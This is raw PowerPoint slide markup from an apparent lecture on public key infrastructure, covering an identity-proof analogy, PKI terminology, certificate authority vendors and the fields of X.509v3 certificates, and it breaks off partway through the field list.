            <a:off x="2362200" y="2217738"/>
            <a:ext cx="3810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lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94215" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2300288" y="4732338"/>
            <a:ext cx="3810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lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94216" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3132138"/>
            <a:ext cx="4481513"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lIns="82124" tIns="41061" rIns="82124" bIns="41061"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94217" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2424113" y="1760538"/>
            <a:ext cx="4038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50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alice applies for a driver’s license.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94218" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2224088" y="5875338"/>
            <a:ext cx="42529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lIns="82124" tIns="41061" rIns="82124" bIns="41061"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94219" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2424113" y="2446338"/>
            <a:ext cx="4038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50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>She receives her driver’s license after her identity is proven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94220" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="4265613"/>
            <a:ext cx="4038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50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alice attempts to cash a check.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94221" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="5221288"/>
            <a:ext cx="40386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50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Her identity is accepted after her driver’s license is checked.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94222" name="Picture 19"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l="25000" r="16667" b="83615"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5792788" y="3276600"/>
            <a:ext cx="269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5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5111750" y="3124200"/>
            <a:ext cx="1441450" cy="901700"/>
            <a:chOff x="2976" y="1344"/>
            <a:chExt cx="908" cy="568"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="94242"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1344"/>
              <a:ext cx="90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1"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3018" y="1500"/>
              <a:ext cx="298" cy="336"/>
              <a:chOff x="3018" y="1500"/>
              <a:chExt cx="298" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="94247" name="Rectangle 20"/>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48" name="Picture 18"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 name="Group 22"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3672" y="1500"/>
              <a:ext cx="148" cy="156"/>
              <a:chOff x="3018" y="1500"/>
              <a:chExt cx="298" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="94245" name="Rectangle 23"/>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46" name="Picture 24"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="3743325"/>
            <a:ext cx="533400" cy="381000"/>
            <a:chOff x="2976" y="1344"/>
            <a:chExt cx="908" cy="568"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="94235"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6" y="1344"/>
              <a:ext cx="90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8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3018" y="1500"/>
              <a:ext cx="298" cy="336"/>
              <a:chOff x="3018" y="1500"/>
              <a:chExt cx="298" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="94240" name="Rectangle 29"/>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41" name="Picture 30"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Group 31"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3672" y="1500"/>
              <a:ext cx="148" cy="156"/>
              <a:chOff x="3018" y="1500"/>
              <a:chExt cx="298" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="94238" name="Rectangle 32"/>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39" name="Picture 33" descr="Woman"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"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34"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="5638800"/>
            <a:ext cx="609600" cy="457200"/>
            <a:chOff x="2976" y="1344"/>
            <a:chExt cx="908" cy="568"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="94228" name="Picture 3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6" y="1344"/>
              <a:ext cx="90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36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3018" y="1500"/>
              <a:ext cx="298" cy="336"/>
              <a:chOff x="3018" y="1500"/>
              <a:chExt cx="298" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="94233" name="Rectangle 37"/>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34" name="Picture 38" descr="Woman"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"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0" name="Group 39"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3672" y="1500"/>
              <a:ext cx="148" cy="156"/>
              <a:chOff x="3018" y="1500"/>
              <a:chExt cx="298" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="94231" name="Rectangle 40"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3018" y="1500"/>
                <a:ext cx="288" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>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pic>
            <p:nvPicPr>
              <p:cNvPr id="94232" name="Picture 41" descr="Woman"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId9" cstate="print">
                <a:extLst>
                  <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                    <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                  </a:ext>
                </a:extLst>
              </a:blip>
              <a:srcRect l="25000" r="16667" b="83615"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3018" y="1500"/>
                <a:ext cx="298" cy="3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pic>
        <p:nvPicPr>
          <p:cNvPr id="94226" name="Picture 43" descr="MCj0434713000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67400" y="5410200"/>
            <a:ext cx="412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7" name="Picture 4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52800" y="4572000"/>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3093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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PKI Terminology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PKI </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>service framework (hardware, software, people, policies and procedures) needed to support large-scale public key-based technologies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Digital Certificate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>document, which binds together the name of the entity and its public key and has been signed by the CA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certificate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authority </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(CA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>trusted third party that signs the public keys of entities in a PKI-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>company that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the services needed to manage the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PKI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30292763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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CA Vendors and Sample Certificates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9625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600200"/>
            <a:ext cx="4995863"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2192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 y="3114675"/>
            <a:ext cx="16668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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3657600"/>
            <a:ext cx="241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fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.verizonbusiness.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96263" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="1949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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.verisign.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9626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4803775"/>
            <a:ext cx="1879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Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="5943600"/>
            <a:ext cx="20097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fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.rsa.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96266" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1981200"/>
            <a:ext cx="1905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fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.entrust.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="96267"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39000" y="1295400"/>
            <a:ext cx="1752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2650" y="3513138"/>
            <a:ext cx="17589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9" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7185025" y="3992563"/>
            <a:ext cx="1806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fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.novell.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="96270"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39000" y="5740400"/>
            <a:ext cx="167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1" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7008813" y="6126163"/>
            <a:ext cx="2058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fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.microsoft.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24260516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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>X.509v3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100355" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>X.509v3 is a standard that describes the certificate structure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>X.509v3 is used with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Secure web servers: SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Web browsers: SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Email programs: S/MIME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10035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676400"/>
            <a:ext cx="404336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3637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Fields of X.509v3 Certificates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Version   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Serial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Number   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Signature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Algorithm   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Issuer   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Validity   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>From   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
